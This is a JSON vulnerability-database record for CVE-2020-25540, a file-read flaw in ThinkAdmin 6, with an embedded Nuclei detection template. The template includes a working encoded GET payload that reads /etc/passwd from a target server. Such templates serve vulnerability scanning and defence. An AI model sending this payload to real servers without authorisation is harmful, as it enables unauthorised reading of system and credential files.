{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-25540/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-25540/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-25540/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-25540/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-25540/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-25540"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-25540"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-25540.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2020-25540\n\ninfo:\n  name: ThinkAdmin 6 - Local File Inclusion\n  author: geeknik\n  severity: high\n  description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n  remediation: |\n    Apply the latest patch or upgrade to a version that is not affected by the vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/48812\n    - https://github.com/zoujingli/ThinkAdmin/issues/244\n    - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/\n    - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-25540\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2020-25540\n    cwe-id: CWE-22\n    epss-score: 0.75332\n    epss-percentile: 0.99492\n    cpe: cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: thinkadmin\n    product: thinkadmin\n  tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s'\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100d78e294e73d9cfbd2d3f1f51cb77ac674aea378dbea6f7729d0b5e5d9d70b47002203257afd0f7f3180d0f9c336e22b48efe347c476bb11d3ff645726b14eeae2af9:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-25540"
}